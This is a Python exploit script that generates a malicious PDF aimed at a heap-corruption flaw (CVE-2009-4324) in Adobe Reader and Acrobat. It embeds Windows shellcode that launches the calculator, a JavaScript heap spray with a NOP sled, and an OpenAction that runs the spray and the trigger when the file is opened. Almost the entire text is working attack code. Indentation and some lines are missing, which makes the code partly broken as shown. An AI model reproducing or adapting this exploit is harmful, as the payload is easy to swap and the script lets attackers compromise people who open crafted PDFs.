Adobe Reader Acrobat - .PDF File Overflow
# Author : Ahmed Obied ([email protected])
# This program generates a PDF file that exploits a vulnerability (CVE-2009-4324)
# in Adobe Reader and Acrobat. The generated PDF file was tested using Adobe
# Reader 9.2.0 on Windows XP SP3. The exploit's payload spawns the calculator.
# Usage : python [output file name]
import sys
class PDF:
def __init__(self):
self.xrefs = []
self.eol = '\x0d\x0a'
self.content = ''
self.xrefs_offset = 0
def header(self):
self.content += '%PDF-1.1' + self.eol
def obj(self, obj_num, data):
self.content += '%d 0 obj' % obj_num
self.content += self.eol + '<< ' + data + ' >>' + self.eol
self.content += 'endobj' + self.eol
def ref(self, ref_num):
return '%d 0 R' % ref_num
def xref(self):
self.xrefs_offset = len(self.content)
self.content += 'xref' + self.eol
self.content += '0 %d' % (len(self.xrefs) + 1)
self.content += self.eol
self.content += '0000000000 65535 f' + self.eol
for i in self.xrefs:
self.content += '%010d 00000 n' % i
self.content += self.eol
def trailer(self):
self.content += 'trailer' + self.eol
self.content += '<< /Size %d' % (len(self.xrefs) + 1)
self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
self.content += 'startxref' + self.eol
self.content += '%d' % self.xrefs_offset
self.content += self.eol
self.content += '%%EOF'
def generate(self):
return self.content
class Exploit:
def convert_to_utf16(self, payload):
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i + j]) & 0xff) << (j * 8)
enc_payload += '%%u%04x' % num
return enc_payload
def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
payload += '\x0a\x02\xb1\x0e'
return self.convert_to_utf16(payload)
def get_exploit(self):
exploit = '''
function spray_heap()
var chunk_size, payload, nopsled;
chunk_size = 0x8000;
payload = unescape("<PAYLOAD>");
nopsled = unescape("<NOP>");
while (nopsled.length < chunk_size)
nopsled += nopsled;
nopsled_len = chunk_size - (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < <CHUNKS> ; i++)
heap_chunks[i] = nopsled + payload;
function trigger_bug()
util.printd("1.000000000000000000000000 : 0000000", new Date());
try {
} catch(e) {}
util.printd("1.000000000000000000000000 : 0000000", new Date());
exploit = exploit.replace('<PAYLOAD>', self.get_payload())
exploit = exploit.replace('<NOP>', '%u0d0d%u0d0d')
exploit = exploit.replace('<CHUNKS>', '1200')
return exploit
def generate_pdf():
exploit = Exploit()
pdf = PDF()
pdf.obj(1, '/Type /Catalog /Outlines ' + pdf.ref(2) + ' /Pages ' + pdf.ref(3) + ' /OpenAction ' + pdf.ref(5))
pdf.obj(2, '/Type /Outlines /Count 0')
pdf.obj(3, '/Type /Pages /Kids [' + pdf.ref(4) + '] /Count 1')
pdf.obj(4, '/Type /Page /Parent ' + pdf.ref(3) + ' /MediaBox [0 0 612 792]')
pdf.obj(5, '/Type /Action /S /JavaScript /JS (%s)' % exploit.get_exploit())
return pdf.generate()
def main():
if len(sys.argv) != 2:
print 'Usage: python %s [output file name]' % sys.argv[0]
file_name = sys.argv[1]
if not file_name.endswith('.pdf'):
file_name = file_name + '.pdf'
fd = open(file_name, 'w')
print '[-] PDF file generated and written to %s' % file_name
except IOError:
print '[*] Error : An IO error has occurred'
print '[-] Exiting ...'
if __name__ == '__main__':